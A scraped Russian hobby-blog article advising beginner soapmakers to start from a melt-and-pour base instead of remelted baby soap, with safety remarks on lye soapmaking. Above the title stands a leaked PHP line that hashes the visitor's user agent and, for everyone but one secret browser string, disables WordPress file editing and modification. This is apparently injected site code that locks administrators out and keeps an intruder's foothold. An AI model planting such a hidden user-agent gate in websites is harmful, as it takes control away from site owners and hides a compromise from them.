if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Начинающему мыловару на заметку | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Начинающему мыловару на заметку

Вот, наконец-то, начитавшись кучу современной литературы про мыловарение, Вы решились попробовать сделать свое первое мыло

Вот, нако­нец-то, начи­тав­шись кучу совре­мен­ной лите­ра­ту­ры про мыло­ва­ре­ние, Вы реши­лись попро­бо­вать сде­лать свое пер­вое мыло.

Каким оно будет: чув­ствен­ным зем­ля­нич­ным с мас­лом мин­да­ля и розо­вы­ми раз­во­да­ми на белом фоне или чер­ное дег­тяр­ное для про­блем­ной кожи? А, может быть, лечеб­ное медо­вое с овся­ны­ми хло­пья­ми и эффек­том скра­ба? Это решать Вам. Глав­ное, из чего будет сде­ла­но мыло. То ли это будет пере­топ­лен­ное дет­ское мыло, то ли осно­ва. Воз­мож­но, кто-то сра­зу риск­нет начать варить мыло с нуля.

Всем нович­кам реко­мен­дую не терять вре­ме­ни и средств и начать из осно­вы (белой, про­зрач­ной или их соче­та­ние). В интер­не­те мно­гие реко­мен­ду­ют попро­бо­вать сде­лать мыло из нату­раль­но­го дет­ско­го, рас­то­пив его на водя­ной бане. Затем в рас­плав­лен­ную мас­су доба­вить воду или моло­ко, базо­вые и эфир­ные мас­ла, кра­си­те­ли и т.д. Могу сра­зу ска­зать, что полу­чит­ся. Ниче­го хоро­ше­го! Кро­ме того, уви­дев резуль­тат, у Вас навсе­гда про­па­дет жела­ние к даль­ней­шим экс­пе­ри­мен­там в мыловарении.

Во-пер­вых, рас­то­пить рав­но­мер­но гото­вое мага­зин­ное мыло очень тяже­ло: по кра­ям посу­ды будет при­го­рать и шипеть, а в цен­тре еще будет пла­вать целый кусо­чек. И неваж­но, натер­ли мыло перед топ­кой на тер­ке или поре­за­ли кусоч­ка­ми. Во-вто­рых, пере­бить запах фаб­рич­но­го мыла, пусть и дет­ско­го без аро­ма­ти­за­то­ров, про­сто невоз­мож­но! Оно пах­нет и будет пах­нуть обыч­ным мылом, хоть целый фла­кон­чик отдуш­ки туда добавь­те. В‑третьих, добав­лять воду или моло­ко к мыль­ной мас­се ни в коем слу­чае нель­зя! Это при­ве­дет к тому, что через сут­ки-двое гото­вый кусок мыла нач­нет завет­ри­вать­ся по кра­ям и кро­шить­ся — ужас­ное и непри­гляд­ное зре­ли­ще. Товар­ный вид мыла будет без­на­деж­но уте­рян! Ну и в‑четвертых, едкий запах при рас­плав­ле­нии мага­зин­но­го мыла ото­бьет жела­ние к даль­ней­ше­му твор­че­ству и оста­вит силь­ное раз­дра­же­ние в носоглотке.

Как бы ни ста­ра­лись уве­рить нас про­из­во­ди­те­ли дет­ско­го мыла о нату­раль­но­сти про­дук­та и об отсут­ствии хими­че­ских доба­вок — это неправ­да. В боль­шин­стве слу­ча­ев в нем есть и кра­си­те­ли, и отдушки.

Теперь пого­во­рим о мыло­ва­ре­нии с нуля, то есть из щело­чи и бат­те­ров (твер­дых масел). Сра­зу ска­жу — про­цесс доволь­но тру­до­ем­кий, тре­бу­ет осто­рож­но­сти и акку­рат­но­сти, но деше­вый по срав­не­нию с осно­вой. Если Вы наме­ря­ны занять­ся мыло­ва­ре­ни­ем все­рьез и надол­го — этот путь для Вас. Един­ствен­ное, что сто­ит при­ку­пить пол­ный ком­плект защит­ной одеж­ды, хим­по­су­ды, выде­лить в квар­ти­ре отдель­ное место для сво­е­го хоб­би и как мож­но надеж­нее отгра­ни­чить его от домаш­них живот­ных и детей. Самое при­ят­ное в мыло­ва­ре­нии с нуля, что тут мож­но тво­рить все, что душе угод­но. варить из любых бат­те­ров, добав­лять любые эфир­ные и базо­вые мас­ла и кра­си­те­ли, созда­вать любые пар­фю­мер­ные ком­по­зи­ции. Толь­ко не переусердствуйте!

В нача­ле ста­тьи я посо­ве­то­ва­ла нович­кам сде­лать мыло из осно­вы. При­во­жу аргу­мен­ты “за”: лег­ко пла­вит­ся, не име­ет запа­ха, гото­вое мыло не завет­ри­ва­ет­ся, не кро­шит­ся и дол­го хра­нит­ся в пер­во­здан­ном виде. Напол­нять осно­ву мож­но чем угод­но (по пра­ви­лам мыло­ва­ре­ния, конеч­но), полу­чит­ся очень кра­си­во. Резуль­тат пора­ду­ет сра­зу же после пер­во­го брус­ка мыла!

Уда­чи и твор­че­ских успехов!


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!